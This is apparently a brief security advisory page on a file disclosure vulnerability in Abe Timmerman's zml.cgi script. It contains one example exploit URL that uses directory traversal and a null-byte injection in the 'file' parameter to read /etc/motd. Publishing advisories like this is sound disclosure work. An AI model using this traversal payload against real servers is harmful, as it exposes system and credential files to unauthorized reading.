Abe Timmerman zml.cgi File Disclosure Vulnerability

info
discussion
exploit
solution
references

Abe Timmerman zml.cgi File Disclosure Vulnerability

This vulnerability can be exploited with a web browser.

The following example has been provided by blackshell@hushmail.com:

http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00